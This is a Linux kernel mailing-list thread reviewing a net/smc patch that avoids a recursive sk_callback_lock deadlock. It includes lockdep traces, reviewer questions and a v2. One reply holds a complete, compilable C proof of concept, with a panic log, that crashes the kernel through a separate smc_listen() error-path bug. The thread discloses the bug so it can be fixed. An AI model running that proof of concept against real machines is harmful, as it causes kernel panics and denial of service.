[PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready

* [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
@ 2026-06-17 15:28 Runyu Xiao
  2026-06-18  6:24 ` Mahanta Jambigi
                   ` (3 more replies)
  0 siblings, 4 replies; 9+ messages in thread
From: Runyu Xiao @ 2026-06-17 15:28 UTC
  To: D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
	linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu,
	runyu.xiao, stable

smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
listen socket's sk_data_ready callback.  smc_clcsock_data_ready() then
immediately takes sk_callback_lock before looking up the SMC listener and
queuing smc_tcp_listen_work().

That is unsafe once the TCP listen socket is leaving TCP_LISTEN.  The TCP
close/flush path can run the installed sk_data_ready callback with
sk_callback_lock already held, so entering smc_clcsock_data_ready() again
tries to take the same rwlock recursively in the same thread.  The nvmet
TCP listener had to make the same state check before taking
sk_callback_lock for this reason.

This issue was found by our static analysis tool and then manually
reviewed against the current tree.

The grounded PoC kept the SMC listen callback installation path:

  smc_listen()
  smc_clcsock_replace_cb()
  sk_data_ready = smc_clcsock_data_ready()

It then modeled the close/flush carrier that invokes the installed
sk_data_ready callback while sk_callback_lock is already held.  Lockdep
reported the same-thread recursive acquisition:

  WARNING: possible recursive locking detected
  smc_clcsock_data_ready+0xa/0x4d [vuln_msv]
  smc_close_flush_work+0x1f/0x30 [vuln_msv]
  *** DEADLOCK ***

Return before taking sk_callback_lock when the underlying TCP socket is no
longer in TCP_LISTEN.  In that state there is no listen accept work to
queue for SMC, and avoiding the callback lock mirrors the fix used by the
TCP nvmet listener.

Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback")
Cc: stable@vger.kernel.org
Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn>
---
 net/smc/af_smc.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
index 6421c2e1c84d..1af4e3c333ff 100644
--- a/net/smc/af_smc.c
+++ b/net/smc/af_smc.c
@@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
 {
 	struct smc_sock *lsmc;

+	if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
+		return;
+
 	read_lock_bh(&listen_clcsock->sk_callback_lock);
 	lsmc = smc_clcsock_user_data(listen_clcsock);
 	if (!lsmc)
-- 
2.34.1

* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao
@ 2026-06-18  6:24 ` Mahanta Jambigi
  2026-06-18 14:16   ` Runyu Xiao
  2026-06-19  5:48 ` [PATCH net v2] " Runyu Xiao
                   ` (2 subsequent siblings)
  3 siblings, 1 reply; 9+ messages in thread
From: Mahanta Jambigi @ 2026-06-18  6:24 UTC
  To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma,
	linux-s390, netdev, linux-kernel, jianhao.xu, stable



On 17/06/26 8:58 pm, Runyu Xiao wrote:
> smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
> listen socket's sk_data_ready callback.  smc_clcsock_data_ready() then
> immediately takes sk_callback_lock before looking up the SMC listener and
> queuing smc_tcp_listen_work().
> 
> That is unsafe once the TCP listen socket is leaving TCP_LISTEN.  The TCP
> close/flush path can run the installed sk_data_ready callback with
> sk_callback_lock already held, so entering smc_clcsock_data_ready() again
> tries to take the same rwlock recursively in the same thread.  The nvmet

Could you provide the exact call stack showing the recursive lock? Also,
please share the nvmet commit details.

> TCP listener had to make the same state check before taking
> sk_callback_lock for this reason.
> 
> This issue was found by our static analysis tool and then manually
> reviewed against the current tree.
> 
> The grounded PoC kept the SMC listen callback installation path:
> 
>   smc_listen()
>   smc_clcsock_replace_cb()
>   sk_data_ready = smc_clcsock_data_ready()
> 
> It then modeled the close/flush carrier that invokes the installed
> sk_data_ready callback while sk_callback_lock is already held.  Lockdep
> reported the same-thread recursive acquisition:
> 
>   WARNING: possible recursive locking detected
>   smc_clcsock_data_ready+0xa/0x4d [vuln_msv]
>   smc_close_flush_work+0x1f/0x30 [vuln_msv]
>   *** DEADLOCK ***
> 
> Return before taking sk_callback_lock when the underlying TCP socket is no
> longer in TCP_LISTEN.  In that state there is no listen accept work to
> queue for SMC, and avoiding the callback lock mirrors the fix used by the
> TCP nvmet listener.
> 
> Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback")
> Cc: stable@vger.kernel.org
> Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn>
> ---
>  net/smc/af_smc.c | 3 +++
>  1 file changed, 3 insertions(+)
> 
> diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
> index 6421c2e1c84d..1af4e3c333ff 100644
> --- a/net/smc/af_smc.c
> +++ b/net/smc/af_smc.c
> @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
>  {
>  	struct smc_sock *lsmc;
>  
> +	if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)

Is the *TCP_LISTEN* check sufficient? What about *TCP_SYN_RECV* or
*TCP_ESTABLISHED*?

> +		return;
> +
>  	read_lock_bh(&listen_clcsock->sk_callback_lock);
>  	lsmc = smc_clcsock_user_data(listen_clcsock);
>  	if (!lsmc)


* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-18  6:24 ` Mahanta Jambigi
@ 2026-06-18 14:16   ` Runyu Xiao
  2026-06-19  5:36     ` Mahanta Jambigi
  0 siblings, 1 reply; 9+ messages in thread
From: Runyu Xiao @ 2026-06-18 14:16 UTC
  To: Mahanta Jambigi, D. Wythe, Dust Li, Sidraya Jayagond,
	Wenjia Zhang, David S. Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni
  Cc: Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma,
	linux-s390, netdev, linux-kernel, jianhao.xu, runyu.xiao

Hi,

Thanks for taking a look.

The exact Lockdep stack I have is from the grounded reproducer, not from
a production SMC setup.  The reproducer keeps the same callback shape:
the close/flush side holds sk_callback_lock and invokes the installed
sk_data_ready callback, which re-enters smc_clcsock_data_ready() and tries
to take sk_callback_lock again.

The relevant Lockdep report is:

  WARNING: possible recursive locking detected
  kworker/u4:3/39 is trying to acquire lock:
    (sk_callback_lock) at smc_clcsock_data_ready+0xa/0x4d

  but task is already holding lock:
    (sk_callback_lock) at smc_close_flush_work+0xc/0x30

  Possible unsafe locking scenario:

        CPU0
        ----
        lock(sk_callback_lock);
        lock(sk_callback_lock);

  *** DEADLOCK ***

  Workqueue: smc_close_wq smc_close_flush_work

  Call Trace:
    dump_stack_lvl
    __lock_acquire
    lock_acquire
    _raw_read_lock_bh
    smc_clcsock_data_ready+0xa/0x4d
    smc_close_flush_work+0x1f/0x30
    process_one_work
    worker_thread
    kthread
    ret_from_fork

The nvmet change I referred to is:

  2fa8961d3a6a ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()")

The stable/backport patch I originally used as the reference is:

  1c90f930e7b4 ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()")

Its commit message says that when the socket is closed while in
TCP_LISTEN, the flush callback can call nvmet_tcp_listen_data_ready()
with sk_callback_lock already held, so nvmet moved the TCP_LISTEN check
before taking sk_callback_lock.

For the TCP_LISTEN check: my reasoning was that smc_clcsock_data_ready()
is installed by smc_listen() on the underlying TCP listen socket and only
queues smc_tcp_listen_work() for the SMC listen/accept path.  Once that
underlying socket is no longer in TCP_LISTEN, there should be no SMC
listen accept work to queue from this callback.  TCP_SYN_RECV and
TCP_ESTABLISHED are not listen-socket states for this callback path, so I
did not intend the callback to queue listen work for those states.

That said, if SMC expects smc_clcsock_data_ready() to handle a non-LISTEN
state during fallback or another transition, then the proposed check is
too strict and I should rework the fix.

Thanks,
Runyu

* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-18 14:16   ` Runyu Xiao
@ 2026-06-19  5:36     ` Mahanta Jambigi
  0 siblings, 0 replies; 9+ messages in thread
From: Mahanta Jambigi @ 2026-06-19  5:36 UTC
  To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma,
	linux-s390, netdev, linux-kernel, jianhao.xu



On 18/06/26 7:46 pm, Runyu Xiao wrote:
> Hi,
> 
> Thanks for taking a look.
> 
> The exact Lockdep stack I have is from the grounded reproducer, not from
> a production SMC setup.  The reproducer keeps the same callback shape:
> the close/flush side holds sk_callback_lock and invokes the installed
> sk_data_ready callback, which re-enters smc_clcsock_data_ready() and tries
> to take sk_callback_lock again.
> 
> The relevant Lockdep report is:
> 
>   WARNING: possible recursive locking detected
>   kworker/u4:3/39 is trying to acquire lock:
>     (sk_callback_lock) at smc_clcsock_data_ready+0xa/0x4d
> 
>   but task is already holding lock:
>     (sk_callback_lock) at smc_close_flush_work+0xc/0x30
> 
>   Possible unsafe locking scenario:
> 
>         CPU0
>         ----
>         lock(sk_callback_lock);
>         lock(sk_callback_lock);
> 
>   *** DEADLOCK ***
> 
>   Workqueue: smc_close_wq smc_close_flush_work
> 
>   Call Trace:
>     dump_stack_lvl
>     __lock_acquire
>     lock_acquire
>     _raw_read_lock_bh
>     smc_clcsock_data_ready+0xa/0x4d
>     smc_close_flush_work+0x1f/0x30
>     process_one_work
>     worker_thread
>     kthread
>     ret_from_fork

Thank you for addressing the feedback. My suggestion would be to reply
to the original email thread where the review comments were given, so
that the maintainers can follow the conversation.

https://www.kernel.org/doc/html/latest/process/submitting-patches.html#respond-to-review-comments

Please include the above call stack in your next version.

> 
> The nvmet change I referred to is:
> 
>   2fa8961d3a6a ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()")

Please include this info in your next version.

> 
> The stable/backport patch I originally used as the reference is:
> 
>   1c90f930e7b4 ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()")
> 
> Its commit message says that when the socket is closed while in
> TCP_LISTEN, the flush callback can call nvmet_tcp_listen_data_ready()
> with sk_callback_lock already held, so nvmet moved the TCP_LISTEN check
> before taking sk_callback_lock.
> 
> For the TCP_LISTEN check: my reasoning was that smc_clcsock_data_ready()
> is installed by smc_listen() on the underlying TCP listen socket and only
> queues smc_tcp_listen_work() for the SMC listen/accept path.  Once that
> underlying socket is no longer in TCP_LISTEN, there should be no SMC
> listen accept work to queue from this callback.  TCP_SYN_RECV and
> TCP_ESTABLISHED are not listen-socket states for this callback path, so I
> did not intend the callback to queue listen work for those states.

I understand. Please include this info in your next version.

> 
> That said, if SMC expects smc_clcsock_data_ready() to handle a non-LISTEN
> state during fallback or another transition, then the proposed check is
> too strict and I should rework the fix.
> 
> Thanks,
> Runyu


* [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao
  2026-06-18  6:24 ` Mahanta Jambigi
@ 2026-06-19  5:48 ` Runyu Xiao
  2026-06-23 10:38   ` XIAO WU
  2026-06-19  6:35 ` [PATCH net] " Dust Li
  2026-06-25  8:32 ` Sidraya Jayagond
  3 siblings, 1 reply; 9+ messages in thread
From: Runyu Xiao @ 2026-06-19  5:48 UTC
  To: D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
	linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu,
	runyu.xiao, stable

smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
listen socket's sk_data_ready callback.  The callback takes
sk_callback_lock before looking up the SMC listener and queuing
smc_tcp_listen_work().

This can recurse when the underlying TCP listen socket is being closed.
The close/flush path may invoke the installed sk_data_ready callback with
sk_callback_lock already held, so smc_clcsock_data_ready() tries to take
the same rwlock again in the same thread.

This issue was found by our static analysis tool and then manually
reviewed against the current tree.  The reproducer keeps the SMC listen
callback installation path:

  smc_listen()
  smc_clcsock_replace_cb()
  sk_data_ready = smc_clcsock_data_ready()

It then models the close/flush carrier that invokes the installed
sk_data_ready callback while sk_callback_lock is already held.  Lockdep
reports the same-thread recursive acquisition:

  WARNING: possible recursive locking detected
  kworker/u4:3/39 is trying to acquire lock:
    (sk_callback_lock) at smc_clcsock_data_ready+0xa/0x4d

  but task is already holding lock:
    (sk_callback_lock) at smc_close_flush_work+0xc/0x30

  Possible unsafe locking scenario:

        CPU0
        ----
        lock(sk_callback_lock);
        lock(sk_callback_lock);

  *** DEADLOCK ***

  Workqueue: smc_close_wq smc_close_flush_work

  Call Trace:
    dump_stack_lvl
    __lock_acquire
    lock_acquire
    _raw_read_lock_bh
    smc_clcsock_data_ready
    smc_close_flush_work
    process_one_work
    worker_thread
    kthread
    ret_from_fork

The same pattern was fixed for nvmet TCP by checking TCP_LISTEN before
taking sk_callback_lock:

  commit 2fa8961d3a6a ("nvmet-tcp: fixup hang in
  nvmet_tcp_listen_data_ready()")

Do the same for SMC.  smc_clcsock_data_ready() is installed by
smc_listen() on the underlying TCP listen socket and only queues
smc_tcp_listen_work() for the SMC listen/accept path.  Once that socket is
no longer in TCP_LISTEN, there is no listen accept work to queue from this
callback, and avoiding sk_callback_lock also avoids the recursive locking
path.

Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback")
Cc: stable@vger.kernel.org
Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn>
---
v2:
- Include the fuller Lockdep stack from the grounded reproducer.
- Add the related nvmet TCP fix reference.
- Explain why the TCP_LISTEN check is valid for the SMC listen callback.

 net/smc/af_smc.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
index 6421c2e1c84d..1af4e3c333ff 100644
--- a/net/smc/af_smc.c
+++ b/net/smc/af_smc.c
@@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
 {
 	struct smc_sock *lsmc;

+	if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
+		return;
+
 	read_lock_bh(&listen_clcsock->sk_callback_lock);
 	lsmc = smc_clcsock_user_data(listen_clcsock);
 	if (!lsmc)
-- 
2.34.1

* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao
  2026-06-18  6:24 ` Mahanta Jambigi
  2026-06-19  5:48 ` [PATCH net v2] " Runyu Xiao
@ 2026-06-19  6:35 ` Dust Li
  2026-06-25  8:32 ` Sidraya Jayagond
  3 siblings, 0 replies; 9+ messages in thread
From: Dust Li @ 2026-06-19  6:35 UTC
  To: Runyu Xiao, D. Wythe, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
	linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable

On 2026-06-17 23:28:55, Runyu Xiao wrote:
>smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
>listen socket's sk_data_ready callback.  smc_clcsock_data_ready() then
>immediately takes sk_callback_lock before looking up the SMC listener and
>queuing smc_tcp_listen_work().
>
>That is unsafe once the TCP listen socket is leaving TCP_LISTEN.  The TCP
>close/flush path can run the installed sk_data_ready callback with
>sk_callback_lock already held, so entering smc_clcsock_data_ready() again
>tries to take the same rwlock recursively in the same thread.  The nvmet
>TCP listener had to make the same state check before taking
>sk_callback_lock for this reason.
>
>This issue was found by our static analysis tool and then manually
>reviewed against the current tree.
>
>The grounded PoC kept the SMC listen callback installation path:
>
>  smc_listen()
>  smc_clcsock_replace_cb()
>  sk_data_ready = smc_clcsock_data_ready()
>
>It then modeled the close/flush carrier that invokes the installed
>sk_data_ready callback while sk_callback_lock is already held.  Lockdep
>reported the same-thread recursive acquisition:
>
>  WARNING: possible recursive locking detected
>  smc_clcsock_data_ready+0xa/0x4d [vuln_msv]
>  smc_close_flush_work+0x1f/0x30 [vuln_msv]
>  *** DEADLOCK ***
>
>Return before taking sk_callback_lock when the underlying TCP socket is no
>longer in TCP_LISTEN.  In that state there is no listen accept work to
>queue for SMC, and avoiding the callback lock mirrors the fix used by the
>TCP nvmet listener.

Hi Runyu,

I noticed the lockdep splat comes from your own kernel module
([vuln_msv]) that models the condition, rather than from a real
TCP code path.

Could you point me to the specific mainline TCP code path that calls
sk_data_ready() while holding sk_callback_lock? If such a path
exists, I'm happy to take this patch. But if this is based solely on
static analysis without a confirmed real call chain, I'd prefer to
focus our review bandwidth on issues that have demonstrated impact.

Thanks,
Dust


* Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-19  5:48 ` [PATCH net v2] " Runyu Xiao
@ 2026-06-23 10:38   ` XIAO WU
  2026-06-24 10:37     ` Runyu Xiao
  0 siblings, 1 reply; 9+ messages in thread
From: XIAO WU @ 2026-06-23 10:38 UTC
  To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
	linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable

Hi Runyu,

Thanks for this patch.

 > diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
 > index 6421c2e1c84d..1af4e3c333ff 100644
 > --- a/net/smc/af_smc.c
 > +++ b/net/smc/af_smc.c
 > @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
 >  {
 >      struct smc_sock *lsmc;
 >
 > +    if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
 > +        return;
 > +
 >      read_lock_bh(&listen_clcsock->sk_callback_lock);
 >      lsmc = smc_clcsock_user_data(listen_clcsock);

The TCP_LISTEN check before taking sk_callback_lock looks correct and
mirrors the same pattern from nvmet TCP.

Sashiko AI review also looked at this patch and flagged a separate
pre-existing issue nearby — the error path in smc_listen() does not
restore icsk_af_ops when kernel_listen() fails:

https://sashiko.dev/#/patchset/20260617152855.1039151-1-runyu.xiao@seu.edu.cn

The relevant code in smc_listen() (net/smc/af_smc.c, lines ~2687-2704):

         smc->ori_af_ops = inet_csk(smc->clcsock->sk)->icsk_af_ops;

         smc->af_ops = *smc->ori_af_ops;
         smc->af_ops.syn_recv_sock = smc_tcp_syn_recv_sock;

         inet_csk(smc->clcsock->sk)->icsk_af_ops = &smc->af_ops;

         if (smc->limit_smc_hs)
                 tcp_sk(smc->clcsock->sk)->smc_hs_congested = smc_hs_congested;

         rc = kernel_listen(smc->clcsock, backlog);
         if (rc) {
                 write_lock_bh(&smc->clcsock->sk->sk_callback_lock);
                 smc_clcsock_restore_cb(&smc->clcsock->sk->sk_data_ready,
                                        &smc->clcsk_data_ready);
                 rcu_assign_sk_user_data(smc->clcsock->sk, NULL);
                 write_unlock_bh(&smc->clcsock->sk->sk_callback_lock);
                 goto out;
         }

The error path restores sk_data_ready and sk_user_data but leaves
icsk_af_ops pointing to &smc->af_ops (whose syn_recv_sock is already
set to smc_tcp_syn_recv_sock).  I verified this in a QEMU VM and can
confirm it triggers a real kernel stack overflow.

=== Reproduction ===

Kernel: 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
Config: ci-qemu-upstream.config (KASAN=y, CONFIG_SMC=y, DEBUG_LIST=y)
QEMU: qemu-system-x86_64 -m 2G -smp 2

Trigger sequence:
   1. SMC socket A: setsockopt(SO_REUSEADDR), bind to port P
      → clcsock gets SO_REUSEADDR via smc_bind() copy
   2. TCP socket C: setsockopt(SO_REUSEADDR), bind + listen on port P
      → Both non-TCP_LISTEN at bind time → bind OK
      → C enters TCP_LISTEN after its listen()
   3. listen(A) on SMC → kernel_listen() fails with EADDRINUSE
      → icsk_af_ops NOT restored → clcsock points to wrapper
   4. Close TCP C (free port), listen(A) again → succeeds
      → ori_af_ops now points to wrapper with
        syn_recv_sock = smc_tcp_syn_recv_sock
   5. TCP connect() to port P → smc_tcp_syn_recv_sock calls itself
      → infinite recursion → IRQ stack guard page hit → kernel panic

=== Full PoC ===

Compile with: gcc -o poc poc.c -static

// PoC: Stack overflow via corrupted icsk_af_ops in smc_listen error path
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#ifndef PF_SMC
#define PF_SMC 43
#endif
#ifndef SMCPROTO_SMC
#define SMCPROTO_SMC 0
#endif

int main(void)
{
     int smc_a, tcp_c, client;
     struct sockaddr_in addr;
     pid_t child;
     int status, ret;
     socklen_t len;
     int val;

     printf("=== SMC listen error path -> stack overflow PoC ===\n\n");

     /* Step 1: SMC socket A with SO_REUSEADDR, bind to any free port */
     printf("[1] Create SMC socket A with SO_REUSEADDR\n");
     smc_a = socket(PF_SMC, SOCK_STREAM, 0);
     if (smc_a < 0) { perror("smc socket"); return 1; }
     val = 1;
     setsockopt(smc_a, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));

     memset(&addr, 0, sizeof(addr));
     addr.sin_family = AF_INET;
     addr.sin_addr.s_addr = htonl(INADDR_ANY);
     addr.sin_port = 0;
     if (bind(smc_a, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
         perror("bind smc_a"); close(smc_a); return 1;
     }
     len = sizeof(addr);
     if (getsockname(smc_a, (struct sockaddr *)&addr, &len) < 0) {
         perror("getsockname"); close(smc_a); return 1;
     }
     int port = ntohs(addr.sin_port);
     printf("  SMC A bound to port %d\n", port);

     /* Step 2: TCP socket C with SO_REUSEADDR, bind+listen on same port */
     printf("[2] TCP C with SO_REUSEADDR, bind+listen on port %d\n", port);
     tcp_c = socket(AF_INET, SOCK_STREAM, 0);
     val = 1;
     setsockopt(tcp_c, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));
     memset(&addr, 0, sizeof(addr));
     addr.sin_family = AF_INET;
     addr.sin_addr.s_addr = htonl(INADDR_ANY);
     addr.sin_port = htons(port);
     if (bind(tcp_c, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
         perror("bind tcp_c"); close(tcp_c); close(smc_a); return 1;
     }
     if (listen(tcp_c, 5) < 0) {
         perror("listen tcp_c"); close(tcp_c); close(smc_a); return 1;
     }
     printf("  TCP C listening on port %d\n", port);

     /* Step 3: listen(A) should FAIL → icsk_af_ops NOT restored */
     printf("[3] listen(SMC A) — expect failure... ");
     fflush(stdout);
     ret = listen(smc_a, 5);
     if (ret == 0) {
         printf("succeeded! Unexpected.\n");
         close(tcp_c); close(smc_a);
         return 1;
     }
     printf("failed: %s\n", strerror(errno));

     /* Step 4: Close TCP C to free the port */
     printf("[4] Close TCP C to free port %d\n", port);
     close(tcp_c);
     sleep(1);

     /* Step 5: listen(A) again → succeeds but ori_af_ops is
      * self-referential */
     printf("[5] listen(SMC A) again... ");
     fflush(stdout);
     ret = listen(smc_a, 5);
     if (ret < 0) {
         printf("failed: %s, retrying...\n", strerror(errno));
         sleep(2);
         ret = listen(smc_a, 5);
     }
     if (ret < 0) {
         perror("retry"); close(smc_a); return 1;
     }
     printf("succeeded! ori_af_ops->syn_recv_sock == "
            "smc_tcp_syn_recv_sock\n");

     /* Step 6: TCP connect → smc_tcp_syn_recv_sock recursion →
      * STACK OVERFLOW */
     printf("[6] TCP connect → triggers infinite recursion...\n");
     fflush(stdout);

     child = fork();
     if (child == 0) {
         client = socket(AF_INET, SOCK_STREAM, 0);
         if (client < 0) exit(1);
         memset(&addr, 0, sizeof(addr));
         addr.sin_family = AF_INET;
         addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
         addr.sin_port = htons(port);
         if (connect(client, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
             perror("connect");
             exit(1);
         }
         sleep(3);
         close(client);
         exit(0);
     }

     printf("Waiting for crash...\n");
     sleep(5);
     if (waitpid(child, &status, WNOHANG) == 0) {
         printf("Child still alive — check dmesg\n");
         kill(child, SIGKILL);
         waitpid(child, NULL, 0);
     }
     close(smc_a);
     return 0;
}

=== Crash Log ===

Linux syzkaller 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
(CONFIG_KASAN=y, CONFIG_SMC=y, CONFIG_DEBUG_LIST=y)

[ 1453.562682][    C0] BUG: IRQ stack guard page was hit at ffffc8ffffffff98 (stack is ffffc90000000000..ffffc90000008000)
[ 1453.562712][    C0] Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI
[ 1453.562733][    C0] CPU: 0 UID: 0 PID: 10840 Comm: poc Not tainted 7.1.0-rc7-gfa471042f07a #1 PREEMPT(full)
[ 1453.562756][    C0] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 1453.562767][    C0] RIP: 0010:__lock_acquire+0x417/0x2730
[ 1453.562965][    C0] Call Trace:
[ 1453.562970][    C0]  <IRQ>
[ 1453.562980][    C0]  lock_acquire+0x1ae/0x360
[ 1453.562995][    C0]  ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563031][    C0]  smc_tcp_syn_recv_sock+0xbf/0xb10
[ 1453.563051][    C0]  ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563073][    C0]  ? __pfx_smc_tcp_syn_recv_sock+0x10/0x10
[ 1453.563114][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563158][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563200][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563244][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
                         [... 15+ recursive frames ...]
[ 1453.564373][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.564413][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.577027][    C0] RIP: 0033:0x423574
[ 1453.577319][    C0] Kernel panic - not syncing: Fatal exception in interrupt

The infinite recursion is visible in the repeated
smc_tcp_syn_recv_sock+0x435/0xb10 frames — each iteration calls
ori_af_ops->syn_recv_sock(), which is itself, pushing a new frame
until the IRQ stack guard page is hit.

Thanks,
Xiao



* Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-23 10:38   ` XIAO WU
@ 2026-06-24 10:37     ` Runyu Xiao
  0 siblings, 0 replies; 9+ messages in thread
From: Runyu Xiao @ 2026-06-24 10:37 UTC
  To: XIAO WU
  Cc: D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
	Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
	linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu

Hi Xiao,

> the error path in smc_listen() does not restore icsk_af_ops when
> kernel_listen() fails

Thanks, this looks like a real error-path bug. I will prepare it as a
separate fix for smc_listen() rather than folding it into this
sk_callback_lock patch.

Runyu


* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao
                   ` (2 preceding siblings ...)
  2026-06-19  6:35 ` [PATCH net] " Dust Li
@ 2026-06-25  8:32 ` Sidraya Jayagond
  3 siblings, 0 replies; 9+ messages in thread
From: Sidraya Jayagond @ 2026-06-25  8:32 UTC
  To: Runyu Xiao, D. Wythe, Dust Li, Wenjia Zhang, David S. Miller,
	Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
	linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable



On 17/06/26 8:58 pm, Runyu Xiao wrote:
> smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
> listen socket's sk_data_ready callback.  smc_clcsock_data_ready() then
> immediately takes sk_callback_lock before looking up the SMC listener and
> queuing smc_tcp_listen_work().
> 
> That is unsafe once the TCP listen socket is leaving TCP_LISTEN.  The TCP
> close/flush path can run the installed sk_data_ready callback with
> sk_callback_lock already held, so entering smc_clcsock_data_ready() again
> tries to take the same rwlock recursively in the same thread.  The nvmet
> TCP listener had to make the same state check before taking
> sk_callback_lock for this reason.
> 
> This issue was found by our static analysis tool and then manually
> reviewed against the current tree.
> 
> The grounded PoC kept the SMC listen callback installation path:
> 
>   smc_listen()
>   smc_clcsock_replace_cb()
>   sk_data_ready = smc_clcsock_data_ready()
> 
> It then modeled the close/flush carrier that invokes the installed
> sk_data_ready callback while sk_callback_lock is already held.  Lockdep
> reported the same-thread recursive acquisition:
> 
>   WARNING: possible recursive locking detected
>   smc_clcsock_data_ready+0xa/0x4d [vuln_msv]
